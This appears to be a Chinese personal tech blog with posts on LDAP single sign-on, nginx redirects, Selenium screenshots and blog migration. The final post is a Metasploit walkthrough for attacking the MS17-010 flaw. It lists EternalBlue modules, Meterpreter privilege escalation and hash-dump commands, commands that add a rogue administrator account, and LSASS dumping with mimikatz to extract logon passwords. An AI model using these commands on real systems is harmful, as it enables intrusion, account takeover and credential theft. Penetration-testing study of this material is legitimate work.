2019年6月17日星期一

LDAP与单点登录

单点登录 英语:Single sign-on,缩写为 SSO)是一种多系统共用一个账号的解决方案。这项功能通常是以轻型目录访问协议(LDAP)来实现。当然,SSO的实现方式有很多种,Oauth2.0。
           a. 访问业务网站,重定向到SSO站点,登录主域
           b. 访问其他业务站点,不再需要登录操作
           c. 一次登录,多站直访

SUL 单用户登录,SDL 单设备登录
          a. 任何设备,无论操作系统,只能同时在一个设备上登录
          b. 对与PC来说,只能同时在一个浏览器上登录
          c. 其他设备登录会把已登录设备挤下线
          d. 像微信等,第一次在其他设备登录,需要原设备进行确认



参考链接:
1. LDAP服务器的概念和原理简单介绍
2. 使用包ldap3进行Python的LDAP操作
3. Python 操作LDAP实现用户统一认证密码修改功能
4. python-ldap修改AD域用户密码(CA+SSL)
5. Python操作LDAP
6. LDAP3 修改的操作-- 官方文档
7. 单点登录(SSO)的设计&实现思路

2019年4月11日星期四

NEM_网络设备管理工具

NEM [Network Equipment Manage] 使用指南

cisco、huawei、h3c网络设备管理,类似ansible的用法,支持多线程下发命令,附带其他应用脚本
目前只支持SSH的方式,不支持Telnet, 以后也不会支持telnet,因为不安全

欢迎star,fork,提问

2019年1月17日星期四

python使用selenium在chrome上进行截图拼接(长截图|全屏截图)

我是拿来主义的人,在google找了很久关于长截图的代码,中文博客写的代码,基本上没有可以用的,后来发现Stack Overflow上有一篇文章,找到了相关代码,很简洁,很好用。


参考链接:
1.Take screenshot of full page with Selenium Python with chromedriver

2018年12月26日星期三

与产品沟通安全设计

在账户安全的问题上,绝不能因为所谓的操作流畅性就降低安全标准。尤其是对于账户安全要求很高的产品,宁可让用户多做几步验证,最大程度地确保验证的准确性。
在交互上,用户会存在操作负担与认知负担,减少认知负担的优先级理应高于减少操作负担。如果因为减少操作负担,造成了账户安全问题,极大地增加了用户的认知负担,是非常得不偿失的行为。

2018年12月6日星期四

博客搬家

通过宝塔提供的工具【计划任务】进行备份
1. 站点目录备份一遍,文件权限属性保持不变
2. 数据库备份一遍

恢复站点
1. 站点目录创建后,把备份的压缩文件解压到站点目录
2. 利用宝塔提供的数据库恢复工具

3. 去站点目录找出wp-config.php,看看数据库的配置
4. 对比,数据库名称,用户名,密码。

2018年12月5日星期三

nginx端口重定向,主域名跳转www,配置

端口重定向 80 --> 9800
ss.abc.com   -->  ss.abc.com:9800

server
{
    listen 80;
    server_name ss.abc.com;
 
    location / {
    proxy_pass http://ss.abc.com:9800;
    proxy_set_header Host $host:80;
    proxy_set_header X-Real-IP $remote_addr;
    proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
    proxy_set_header Via "nginx";
    }
}


宝塔创建一个abc.com的站点,

一级域名跳转到www二级域名

  1. #只是一级域名“abc.com” 跳转到www.abc.com去。
server {
           listen 80;
           server_name abc.com;

           if ($http_host ~ "^ilovegt.com$") {
                     rewrite ^(.*) http://www.ilovegt.com$1 permanent;
            }
}

2018年11月8日星期四

针对MS17-010漏洞攻击之Metasploit

0x01 hash密码导出,并且破解方法
If LM hashes are enabled on your system (Win XP and lower), a hash dump will look like:
Administrator:500:01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F797BF2A82807973B89537:::

If LM hashes are disabled on your system (Win Vista, 7, 8+), a hash dump will look like:
Administrator:500:NO PASSWORD*********************:0CB6948805F797BF2A82807973B89537:::
每个字段的含义:          用户名:唯一安全ID:LM_HASH :NTLM_HASH
这串值就是LM_HASH,通过google “lm hash crack” 尝试破解
01FC5A6BE7BC6929AAD3B435B51404EE

0x02 Meterpreter 命令行工具
通过google搜索  “Metasploit工具Meterpreter的命令速查表”对反弹shell进行利用
其中比较常用的命令:
getuid                                        查看当前用户
getsystem                                  获取系统权限
shell                                           打开shell或者cmd
run hashdump                           把sam数据库dump



0x03 常用payload
 use windows/meterpreter/reverse_tcp
 use auxiliary/scanner/smb/pipe_auditor

ms17-010 payload:
       use exploit/windows/smb/ms17_010_eternalblue
       use exploit/windows/smb/ms17_010_psexec

0x04 ms17-010漏洞利用
     使用metasploit(MSF)对windows的ms17-010漏洞进行利用的过程
     MSF下ms17_010_psexec模块使用技巧
     Meterpreter提权详解



0x05 windows修改用户密码技巧
因为中文的windwos系统,在Meterpreter 会显示乱码,在进行net user操作出现报错

比如 NET HELPMSG 2245  表示密码长度不够规格,不够复杂
比如 NET HELPMSG 3783  表示没有这个组或者用户
net user administrator abc123      //修改administrator的密码
net user test v5est0r /add                    //增加新用户
net localgroup administrators test /add       //并且加入管理员组
0x06 获取system权限,对管理员密码获取
利用Meterpreter upload 上传 ProcDump 对系统的LSASS进程内存文件导出,命令如下
Procdump.exe -accepteula -ma lsass.exe lsass.dmp
导出后,利用Meterpreter download 将 lsass.dmp 文件下载到本地
最后运行mimikatz,进行破解
mimikatz # sekurlsa::minidump lsass.dmp
mimikatz # sekurlsa::logonPasswords full

Meterpreter 加载mimikatz直接进行破解

load mimikatz
help mimikatz
mimikatz_command -f privilege::debug
mimikatz_command -f privilege::security
mimikatz_command -f sekurlsa::logonPasswords